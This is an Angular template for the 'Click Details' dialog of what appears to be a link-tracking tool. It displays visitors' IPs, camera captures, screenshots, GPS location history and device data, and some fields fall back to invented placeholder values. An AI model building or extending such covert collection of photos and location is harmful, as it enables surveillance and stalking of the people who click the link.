<div class="click-details-dialog" (click)="$event.stopPropagation()">
    <div class="dialog-header">
        <div class="header-content">
            <h2 class="dialog-title">Click Details</h2>
            <p class="dialog-subtitle">Captured at {{ data.timestamp }}</p>
        </div>
        <button type="button" class="close-btn" (click)="close()" aria-label="Close">
            <i class="fas fa-times"></i>
        </button>
    </div>

    <nav class="tabs-nav">
        <button type="button" class="tab-btn" [class.active]="activeTab === 'overview'" (click)="setActiveTab('overview')">
            Overview
        </button>
        <button type="button" class="tab-btn" [class.active]="activeTab === 'media'" (click)="setActiveTab('media')">
            Media
        </button>
        <button type="button" class="tab-btn" [class.active]="activeTab === 'screenshot'" (click)="setActiveTab('screenshot')">
            Screenshot
        </button>
        <button type="button" class="tab-btn" [class.active]="activeTab === 'location'" (click)="setActiveTab('location')">
            Location
        </button>
        <button type="button" class="tab-btn" [class.active]="activeTab === 'device'" (click)="setActiveTab('device')">
            Device
        </button>
        <!-- Fingerprint tab hidden for now
        <button type="button" class="tab-btn" [class.active]="activeTab === 'fingerprint'" (click)="setActiveTab('fingerprint')">
            Fingerprint
        </button>
        -->
    </nav>

    <div class="dialog-body">
        <!-- Overview Tab -->
        <div class="tab-content overview-tab" *ngIf="activeTab === 'overview'">
            <div class="overview-grid">
                <div class="info-section overview-card">
                    <h3 class="section-title overview-section-title">
                        <i class="fas fa-wifi section-icon"></i>
                        IP &amp; Network Information
                    </h3>
                    <p class="kv-row">
                        <strong>Server IP:</strong>
                        <span class="server-ip-box">{{ data.serverIp ?? data.ipAddress }}</span>
                    </p>
                    <div class="webrtc-block" *ngIf="data.webrtcIps && data.webrtcIps.length">
                        <strong class="webrtc-label">WebRTC IPs (Legacy):</strong>
                        <div class="ip-list">
                            <span *ngFor="let ip of data.webrtcIps" class="ip-item">{{ ip }}</span>
                        </div>
                    </div>
                </div>

                <div class="info-section overview-card">
                    <h3 class="section-title overview-section-title">
                        <i class="fas fa-battery-full section-icon"></i>
                        Battery &amp; Performance
                    </h3>
                    <p class="kv-row"><strong>Battery:</strong> {{ data.batteryStatus ?? '100% (Charging)' }}</p>
                    <p class="kv-row"><strong>Time on Page:</strong> {{ data.timeOnPage ?? '12.1s' }}</p>
                    <p class="kv-row"><strong>Scroll Depth:</strong> {{ data.scrollDepth ?? '100%' }}</p>
                </div>
            </div>

            <div class="info-section overview-card full-width">
                <h3 class="section-title overview-section-title">
                    <i class="fas fa-lock section-icon"></i>
                    Permissions
                </h3>
                <div class="permissions-row">
                    <p class="kv-row">
                        <strong>Location:</strong>
                        <span class="badge badge-granted" *ngIf="data.locationGranted !== false">
                            <i class="fas fa-check"></i> Granted
                        </span>
                        <span class="badge badge-denied" *ngIf="data.locationGranted === false">Denied</span>
                    </p>
                    <p class="kv-row">
                        <strong>Camera:</strong>
                        <span class="badge badge-granted" *ngIf="data.cameraGranted !== false">
                            <i class="fas fa-check"></i> Granted
                        </span>
                        <span class="badge badge-denied" *ngIf="data.cameraGranted === false">Denied</span>
                    </p>
                </div>
            </div>
        </div>
        <!-- Screenshot Tab -->
        <div class="tab-content" *ngIf="activeTab === 'screenshot'">
            <div class="info-section" *ngIf="getScreenshot()">
                <h3 class="section-title">
                    <i class="fas fa-desktop section-icon"></i>
                    Screenshot
                </h3>
                <div class="screenshot-wrap">
                    <img [src]="getScreenshot()" alt="Screenshot" class="screenshot-img" />
                    <button type="button" class="download-btn" (click)="downloadScreenshot()">
                        <i class="fas fa-download"></i> Download
                    </button>
                </div>
            </div>

            <p class="empty-msg" *ngIf="!getScreenshot() && !getCameraCaptures().length">No media available.</p>
        </div>

        <!-- Media Tab -->
        <div class="tab-content" *ngIf="activeTab === 'media'">

            <div class="info-section" *ngIf="getCameraCaptures().length">
                <h3 class="section-title">
                    <i class="fas fa-camera section-icon"></i>
                    Camera Captures ({{ getCameraCaptures().length }} photos)
                </h3>
                <div class="camera-grid">
                    <div class="camera-item" *ngFor="let url of getCameraCaptures(); let i = index">
                        <div class="camera-thumb-wrap">
                            <img [src]="url" alt="Capture {{ i + 1 }}" class="camera-thumb" />
                            <span class="camera-label">#{{ i + 1 }}</span>
                        </div>
                        <button type="button" class="download-btn" (click)="downloadCapture(url, i)">
                            <i class="fas fa-download"></i> Download
                        </button>
                    </div>
                </div>
            </div>
            <p class="empty-msg" *ngIf="!getScreenshot() && !getCameraCaptures().length">No media available.</p>
        </div>

        <!-- Location Tab -->
        <div class="tab-content" *ngIf="activeTab === 'location'">
            <div class="location-sections">

                <div class="info-section card-section">
                    <h3 class="section-title">
                        <i class="fas fa-globe section-icon"></i>
                        IP Geolocation
                    </h3>
                    <p class="kv-row"><strong>Country:</strong> {{ data.ipCountry ?? 'Unknown' }}</p>
                    <p class="kv-row"><strong>Region:</strong> {{ data.ipRegion ?? 'Unknown' }}</p>
                    <p class="kv-row"><strong>City:</strong> {{ data.ipCity ?? 'Unknown' }}</p>
                    <p class="kv-row"><strong>Organization:</strong> {{ data.ipOrg ?? '—' }}</p>
                    <p class="kv-row"><strong>Coordinates:</strong> {{ getIpCoords() }} (IP)</p>
                    <button type="button" class="action-btn action-btn-dark" (click)="openIpLocation()">
                        <i class="fas fa-globe"></i> View IP Location on Map
                    </button>
                </div>
                <div class="info-section card-section">
                    <h3 class="section-title">
                        <i class="fas fa-map-marker-alt section-icon"></i>
                        GPS Location
                    </h3>
                    <ng-container *ngIf="getPrimaryGpsPoint() as gps; else noGpsData">
                        <p class="kv-row"><strong>Latitude:</strong> {{ gps.latitude ?? '—' }}</p>
                        <p class="kv-row"><strong>Longitude:</strong> {{ gps.longitude ?? '—' }}</p>
                        <p class="kv-row"><strong>Accuracy:</strong> ±{{ gps.accuracy ?? '—' }}m</p>
                        <p class="kv-row"><strong>Captured At:</strong> {{ formatLocationTimestamp(gps.timestamp) }}</p>
                    </ng-container>
                    <ng-template #noGpsData>
                        <p class="kv-row">No GPS history available.</p>
                    </ng-template>
                    <button type="button" class="action-btn action-btn-dark" (click)="openGoogleMaps()" [disabled]="!hasGpsHistory()">
                        <i class="fas fa-map-marker-alt"></i> View on Google Maps
                    </button>
                </div>

                <div class="info-section card-section gps-history-section" *ngIf="getLocationHistory().length">
                    <h3 class="section-title">
                        <i class="fas fa-route section-icon"></i>
                        GPS Location History ({{ getLocationHistory().length }} points)
                    </h3>
                    <div class="gps-history-list">
                        <div class="gps-history-item" *ngFor="let p of getLocationHistory(); let i = index">
                            <div class="gps-history-meta">
                                <p class="kv-row"><strong>#{{ i + 1 }}</strong> {{ formatLocationTimestamp(p.timestamp) }}</p>
                                <p class="kv-row"><strong>Lat:</strong> {{ p.latitude ?? '—' }}</p>
                                <p class="kv-row"><strong>Lon:</strong> {{ p.longitude ?? '—' }}</p>
                                <p class="kv-row"><strong>Accuracy:</strong> ±{{ p.accuracy ?? '—' }}m</p>
                            </div>
                            <button type="button" class="action-btn action-btn-light gps-history-map-btn" (click)="openGoogleMapsForPoint(p.latitude, p.longitude)">
                                <i class="fas fa-map-pin"></i> Map
                            </button>
                        </div>
                    </div>
                </div>

            </div>
        </div>

        <!-- Device Tab -->
        <div class="tab-content" *ngIf="activeTab === 'device'">
            <div class="info-section">
                <h3 class="section-title">
                    <i class="fas fa-desktop section-icon"></i>
                    Device Information
                </h3>
                <p class="kv-row"><strong>Browser:</strong> {{ data.browser ?? 'Chrome' }}</p>
                <p class="kv-row"><strong>OS:</strong> {{ data.os ?? 'Windows' }}</p>
                <p class="kv-row"><strong>Device Type:</strong> {{ data.deviceType ?? 'desktop' }}</p>
                <p class="kv-row"><strong>Screen Resolution:</strong> {{ data.resolution }}</p>
            </div>
            <div class="info-section">
                <h3 class="section-title">User Agent:</h3>
                <pre class="user-agent-box">{{ data.userAgent ?? 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36' }}</pre>
            </div>
        </div>

        <!-- Fingerprint Tab -->
        <!-- <div class="tab-content" *ngIf="activeTab === 'fingerprint'">
            <p class="empty-msg">Fingerprint details coming soon.</p>
        </div> -->
    </div>
</div>